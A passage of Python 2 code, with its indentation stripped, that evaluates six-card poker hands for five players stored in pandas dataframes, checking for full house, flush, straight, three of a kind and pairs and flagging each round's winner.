for o in (list[0], list[1], list[2], list[3], list[4], list[5]):
if n == o:
count = count + 1
if count == 2:
FH = FH + 1
a4i = m
a4ii = n
break
# Evaluate for P5
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
list[5] = df5.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 3:
for n in (list[0], list[1]):
count = 0
if m == n:
continue
else:
for o in (list[0], list[1], list[2], list[3], list[4], list[5]):
if n == o:
count = count + 1
if count == 2:
FH = FH + 1
a5i = m
a5ii = n
break
# Evaluating for Full House
if (FH > 1):
print "Full House"
b = max(a1i, a2i, a3i, a4i, a5i)
c = 0
if a1i == b:
c = c + 1
if a2i == b:
c = c + 1
if a3i == b:
c = c + 1
if a4i == b:
c = c + 1
if a5i == b:
c = c + 1
if c > 1:
b = max(a1ii, a2ii, a3ii, a4ii, a5ii)
if a1ii == b:
df1.iloc[i * 4 + k - 1, 14] = 1
if a2ii == b:
df2.iloc[i * 4 + k - 1, 14] = 1
if a3ii == b:
df3.iloc[i * 4 + k - 1, 14] = 1
if a4ii == b:
df4.iloc[i * 4 + k - 1, 14] = 1
if a5ii == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
b = max(a1i, a2i, a3i, a4i, a5i)
if a1i == b:
df1.iloc[i * 4 + k - 1, 14] = 1
elif a2i == b:
df2.iloc[i * 4 + k - 1, 14] = 1
elif a3i == b:
df3.iloc[i * 4 + k - 1, 14] = 1
elif a4i == b:
df4.iloc[i * 4 + k - 1, 14] = 1
elif a5i == b:
df5.iloc[i * 4 + k - 1, 14] = 1
elif (FH == 1):
print "Full House"
b = max(a1i, a2i, a3i, a4i, a5i)
if a1i == b:
df1.iloc[i * 4 + k - 1, 14] = 1
elif a2i == b:
df2.iloc[i * 4 + k - 1, 14] = 1
elif a3i == b:
df3.iloc[i * 4 + k - 1, 14] = 1
elif a4i == b:
df4.iloc[i * 4 + k - 1, 14] = 1
elif a5i == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Evaluate for Flush
F = 0
a1 = 0
a2 = 0
a3 = 0
a4 = 0
a5 = 0
# Evaluate P1
list[0] = df1.iloc[i * 4 + k - 1, 0]
list[1] = df1.iloc[i * 4 + k - 1, 2]
list[2] = df1.iloc[i * 4 + k - 1, 4]
list[3] = df1.iloc[i * 4 + k - 1, 6]
list[4] = df1.iloc[i * 4 + k - 1, 8]
list[5] = df1.iloc[i * 4 + k - 1, 10]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
F = F + 1
a1 = max(df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 3],
df1.iloc[i * 4 + k - 1, 5],
df1.iloc[i * 4 + k - 1, 7], df1.iloc[i * 4 + k - 1, 9])
elif list[5] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
F = F + 1
a1 = max(df1.iloc[i * 4 + k - 1, 11], df1.iloc[i * 4 + k - 1, 3],
df1.iloc[i * 4 + k - 1, 5],
df1.iloc[i * 4 + k - 1, 7], df1.iloc[i * 4 + k - 1, 9])
elif list[0] == list[5] and list[5] == list[2] and list[2] == list[3] and list[3] == list[4]:
F = F + 1
a1 = max(df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 11],
df1.iloc[i * 4 + k - 1, 5],
df1.iloc[i * 4 + k - 1, 7], df1.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[5] and list[5] == list[3] and list[3] == list[4]:
F = F + 1
a1 = max(df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 3],
df1.iloc[i * 4 + k - 1, 11],
df1.iloc[i * 4 + k - 1, 7], df1.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[2] and list[2] == list[5] and list[5] == list[4]:
F = F + 1
a1 = max(df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 3],
df1.iloc[i * 4 + k - 1, 5],
df1.iloc[i * 4 + k - 1, 11], df1.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[5]:
F = F + 1
a1 = max(df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 3],
df1.iloc[i * 4 + k - 1, 5],
df1.iloc[i * 4 + k - 1, 7], df1.iloc[i * 4 + k - 1, 11])
# Evaluate P2
list[0] = df2.iloc[i * 4 + k - 1, 0]
list[1] = df2.iloc[i * 4 + k - 1, 2]
list[2] = df2.iloc[i * 4 + k - 1, 4]
list[3] = df2.iloc[i * 4 + k - 1, 6]
list[4] = df2.iloc[i * 4 + k - 1, 8]
list[5] = df2.iloc[i * 4 + k - 1, 10]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
F = F + 1
a2 = max(df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 3],
df2.iloc[i * 4 + k - 1, 5],
df2.iloc[i * 4 + k - 1, 7], df2.iloc[i * 4 + k - 1, 9])
elif list[5] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[
4]:
F = F + 1
a2 = max(df2.iloc[i * 4 + k - 1, 11], df2.iloc[i * 4 + k - 1, 3],
df2.iloc[i * 4 + k - 1, 5],
df2.iloc[i * 4 + k - 1, 7], df2.iloc[i * 4 + k - 1, 9])
elif list[0] == list[5] and list[5] == list[2] and list[2] == list[3] and list[3] == list[
4]:
F = F + 1
a2 = max(df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 11],
df2.iloc[i * 4 + k - 1, 5],
df2.iloc[i * 4 + k - 1, 7], df2.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[5] and list[5] == list[3] and list[3] == list[
4]:
F = F + 1
a2 = max(df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 3],
df2.iloc[i * 4 + k - 1, 11],
df2.iloc[i * 4 + k - 1, 7], df2.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[2] and list[2] == list[5] and list[5] == list[
4]:
F = F + 1
a2 = max(df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 3],
df2.iloc[i * 4 + k - 1, 5],
df2.iloc[i * 4 + k - 1, 11], df2.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[
5]:
F = F + 1
a2 = max(df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 3],
df2.iloc[i * 4 + k - 1, 5],
df2.iloc[i * 4 + k - 1, 7], df2.iloc[i * 4 + k - 1, 11])
# Evaluate P3
list[0] = df3.iloc[i * 4 + k - 1, 0]
list[1] = df3.iloc[i * 4 + k - 1, 2]
list[2] = df3.iloc[i * 4 + k - 1, 4]
list[3] = df3.iloc[i * 4 + k - 1, 6]
list[4] = df3.iloc[i * 4 + k - 1, 8]
list[5] = df3.iloc[i * 4 + k - 1, 10]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
F = F + 1
a3 = max(df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 3],
df3.iloc[i * 4 + k - 1, 5],
df3.iloc[i * 4 + k - 1, 7], df3.iloc[i * 4 + k - 1, 9])
elif list[5] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[
4]:
F = F + 1
a3 = max(df3.iloc[i * 4 + k - 1, 11], df3.iloc[i * 4 + k - 1, 3],
df3.iloc[i * 4 + k - 1, 5],
df3.iloc[i * 4 + k - 1, 7], df3.iloc[i * 4 + k - 1, 9])
elif list[0] == list[5] and list[5] == list[2] and list[2] == list[3] and list[3] == list[
4]:
F = F + 1
a3 = max(df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 11],
df3.iloc[i * 4 + k - 1, 5],
df3.iloc[i * 4 + k - 1, 7], df3.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[5] and list[5] == list[3] and list[3] == list[
4]:
F = F + 1
a3 = max(df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 3],
df3.iloc[i * 4 + k - 1, 11],
df3.iloc[i * 4 + k - 1, 7], df3.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[2] and list[2] == list[5] and list[5] == list[
4]:
F = F + 1
a3 = max(df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 3],
df3.iloc[i * 4 + k - 1, 5],
df3.iloc[i * 4 + k - 1, 11], df3.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[
5]:
F = F + 1
a3 = max(df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 3],
df3.iloc[i * 4 + k - 1, 5],
df3.iloc[i * 4 + k - 1, 7], df3.iloc[i * 4 + k - 1, 11])
# Evaluate P4
list[0] = df4.iloc[i * 4 + k - 1, 0]
list[1] = df4.iloc[i * 4 + k - 1, 2]
list[2] = df4.iloc[i * 4 + k - 1, 4]
list[3] = df4.iloc[i * 4 + k - 1, 6]
list[4] = df4.iloc[i * 4 + k - 1, 8]
list[5] = df4.iloc[i * 4 + k - 1, 10]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
F = F + 1
a4 = max(df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 3],
df4.iloc[i * 4 + k - 1, 5],
df4.iloc[i * 4 + k - 1, 7], df4.iloc[i * 4 + k - 1, 9])
elif list[5] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[
4]:
F = F + 1
a4 = max(df4.iloc[i * 4 + k - 1, 11], df4.iloc[i * 4 + k - 1, 3],
df4.iloc[i * 4 + k - 1, 5],
df4.iloc[i * 4 + k - 1, 7], df4.iloc[i * 4 + k - 1, 9])
elif list[0] == list[5] and list[5] == list[2] and list[2] == list[3] and list[3] == list[
4]:
F = F + 1
a4 = max(df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 11],
df4.iloc[i * 4 + k - 1, 5],
df4.iloc[i * 4 + k - 1, 7], df4.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[5] and list[5] == list[3] and list[3] == list[
4]:
F = F + 1
a4 = max(df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 3],
df4.iloc[i * 4 + k - 1, 11],
df4.iloc[i * 4 + k - 1, 7], df4.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[2] and list[2] == list[5] and list[5] == list[
4]:
F = F + 1
a4 = max(df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 3],
df4.iloc[i * 4 + k - 1, 5],
df4.iloc[i * 4 + k - 1, 11], df4.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[
5]:
F = F + 1
a4 = max(df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 3],
df4.iloc[i * 4 + k - 1, 5],
df4.iloc[i * 4 + k - 1, 7], df4.iloc[i * 4 + k - 1, 11])
# Evaluate P5
list[0] = df5.iloc[i * 4 + k - 1, 0]
list[1] = df5.iloc[i * 4 + k - 1, 2]
list[2] = df5.iloc[i * 4 + k - 1, 4]
list[3] = df5.iloc[i * 4 + k - 1, 6]
list[4] = df5.iloc[i * 4 + k - 1, 8]
list[5] = df5.iloc[i * 4 + k - 1, 10]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
F = F + 1
a5 = max(df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 3],
df5.iloc[i * 4 + k - 1, 5],
df5.iloc[i * 4 + k - 1, 7], df5.iloc[i * 4 + k - 1, 9])
elif list[5] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[
4]:
F = F + 1
a5 = max(df5.iloc[i * 4 + k - 1, 11], df5.iloc[i * 4 + k - 1, 3],
df5.iloc[i * 4 + k - 1, 5],
df5.iloc[i * 4 + k - 1, 7], df5.iloc[i * 4 + k - 1, 9])
elif list[0] == list[5] and list[5] == list[2] and list[2] == list[3] and list[3] == list[
4]:
F = F + 1
a5 = max(df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 11],
df5.iloc[i * 4 + k - 1, 5],
df5.iloc[i * 4 + k - 1, 7], df5.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[5] and list[5] == list[3] and list[3] == list[
4]:
F = F + 1
a5 = max(df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 3],
df5.iloc[i * 4 + k - 1, 11],
df5.iloc[i * 4 + k - 1, 7], df5.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[2] and list[2] == list[5] and list[5] == list[
4]:
F = F + 1
a5 = max(df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 3],
df5.iloc[i * 4 + k - 1, 5],
df5.iloc[i * 4 + k - 1, 11], df5.iloc[i * 4 + k - 1, 9])
elif list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[
5]:
F = F + 1
a5 = max(df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 3],
df5.iloc[i * 4 + k - 1, 5],
df5.iloc[i * 4 + k - 1, 7], df5.iloc[i * 4 + k - 1, 11])
if F > 0:
print "Flush"
b = max(a1, a2, a3, a4, a5)
if a1 == b:
df1.iloc[i * 4 + k - 1, 14] = 1
elif a2 == b:
df2.iloc[i * 4 + k - 1, 14] = 1
elif a3 == b:
df3.iloc[i * 4 + k - 1, 14] = 1
elif a4 == b:
df4.iloc[i * 4 + k - 1, 14] = 1
elif a5 == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Check for Straight
SF = 0
a1 = 0
a2 = 0
a3 = 0
a4 = 0
a5 = 0
# P1 Evaluation
# With Ace Low
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
list[5] = df1.iloc[i * 4 + k - 1, 11]
for m in range(0, 6):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a1 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == list[5]:
a1 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
list[5] = df1.iloc[i * 4 + k - 1, 11]
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a1 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == list[
5]:
a1 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# P2 Evaluation
# With Ace Low
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
list[5] = df2.iloc[i * 4 + k - 1, 11]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a2 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a2 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
list[5] = df2.iloc[i * 4 + k - 1, 11]
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a2 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a2 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# P3 Evaluation
# With Ace Low
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
list[5] = df3.iloc[i * 4 + k - 1, 11]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == \
list[
4]:
a3 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a3 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
list[5] = df3.iloc[i * 4 + k - 1, 11]
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a3 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a3 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# P4 Evaluation
# With Ace Low
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
list[5] = df4.iloc[i * 4 + k - 1, 11]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == \
list[4]:
a4 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a4 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
list[5] = df4.iloc[i * 4 + k - 1, 11]
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a4 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a4 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# P5 Evaluation
# With Ace Low
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
list[5] = df5.iloc[i * 4 + k - 1, 11]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == \
list[4]:
a5 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a5 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
list[5] = df5.iloc[i * 4 + k - 1, 11]
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a5 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
if list[1] + 1 == list[2] and list[2] + 1 == list[3] and list[3] + 1 == list[4] and \
list[4] + 1 == \
list[
5]:
a5 = max(list[5], list[1], list[2], list[3], list[4])
SF = SF + 1
# Check for Straight
if (SF > 0):
print "Straight"
b = max(a1, a2, a3, a4, a5)
if a1 == b:
df1.iloc[i * 4 + k - 1, 14] = 1
if a2 == b:
df2.iloc[i * 4 + k - 1, 14] = 1
if a3 == b:
df3.iloc[i * 4 + k - 1, 14] = 1
if a4 == b:
df4.iloc[i * 4 + k - 1, 14] = 1
if a5 == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Check for 3 of a kind
FH = 0
a1i = 0
a2i = 0
a3i = 0
a4i = 0
a5i = 0
# Evaluate for P1
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
list[5] = df1.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 3:
FH = FH + 1
a1i = m
break
# Evaluate for P2
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
list[5] = df2.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 3:
FH = FH + 1
a2i = m
break
# Evaluate for P3
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
list[5] = df3.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 3:
FH = FH + 1
a3i = m
break
# Evaluate for P4
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
list[5] = df4.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 3:
FH = FH + 1
a4i = m
break
# Evaluate for P5
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
list[5] = df5.iloc[i * 4 + k - 1, 11]
for m in (list[0], list[1]):
count = 0
for n in (list[0], list[1], list[2], list[3], list[4], list[5]):
if m == n:
count = count + 1
if count == 3:
FH = FH + 1
a5i = m
break
# Evaluating for 3 of a kind
if (FH > 0):
print "3 of a kind"
b = max(a1i, a2i, a3i, a4i, a5i)
if a1i == b:
df1.iloc[i * 4 + k - 1, 14] = 1
elif a2i == b:
df2.iloc[i * 4 + k - 1, 14] = 1
elif a3i == b:
df3.iloc[i * 4 + k - 1, 14] = 1
elif a4i == b:
df4.iloc[i * 4 + k - 1, 14] = 1
elif a5i == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
# Evaluate for two pair and one pair
f1 = [0]
f2 = [0]
f3 = [0]
f4 = [0]
f5 = [0]
a1 = [0]
a2 = [0]
a3 = [0]
a4 = [0]
a5 = [0]
Fin = 0
# Evaluate P1
TP1 = 0
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
list[5] = df1.iloc[i * 4 + k - 1, 11]
if (list[0] == list[2] or list[0] == list[3] or list[
0] == list[4] or list[0] == list[5]):
TP1 = TP1 + 1
f1.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] == list[4] or list[1] == list[5]):
TP1 = TP1 + 1
f1.append(list[1])
if (list[0] == list[1]):
TP1 = TP1 + 1
f1.append(list[1])
if TP1 > 1:
f1 = np.sort(f1[::-1]).tolist()
a1.append(f1[0])
a1.append(f1[1])
Fin = Fin + 1
# Evaluate P2
TP2 = 0
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
list[5] = df2.iloc[i * 4 + k - 1, 11]
if (list[0] == list[2] or list[0] == list[3] or
list[0] == list[4] or list[0] == list[5]):
TP2 = TP2 + 1
f2.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] == list[4] or list[1] == list[5]):
TP2 = TP2 + 1
f2.append(list[1])
if (list[0] == list[1]):
TP1 = TP1 + 1
f2.append(list[1])
if TP2 > 1:
f2 = np.sort(f2[::-1]).tolist()
a2.append(f2[0])
a2.append(f2[1])
Fin = Fin + 1
# Evaluate P3
TP3 = 0
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
list[5] = df3.iloc[i * 4 + k - 1, 11]
if (list[0] == list[2] or list[0] == list[
3] or list[0] == list[4] or list[0] == list[5]):
TP3 = TP3 + 1
f3.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] == list[4] or list[1] == list[5]):
TP3 = TP3 + 1
f3.append(list[1])
if (list[0] == list[1]):
TP1 = TP1 + 1
f3.append(list[1])
if TP3 > 1:
f3 = np.sort(f3[::-1]).tolist()
a3.append(f3[0])
a3.append(f3[1])
Fin = Fin + 1
# Evaluate P4
TP4 = 0
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
list[5] = df4.iloc[i * 4 + k - 1, 11]
if (list[0] == list[2] or list[0] == list[
3] or list[0] == list[4] or list[0] == list[5]):
TP4 = TP4 + 1
f4.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] == list[
4] or list[1] == list[5]):
TP4 = TP4 + 1
f4.append(list[1])
if (list[0] == list[1]):
TP1 = TP1 + 1
f4.append(list[1])
if TP4 > 1:
f4 = np.sort(f4[::-1]).tolist()
a4.append(f4[0])
a4.append(f4[1])
Fin = Fin + 1
# Evaluate P5
TP5 = 0
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
list[5] = df5.iloc[i * 4 + k - 1, 11]
if (list[0] == list[2] or list[0] ==
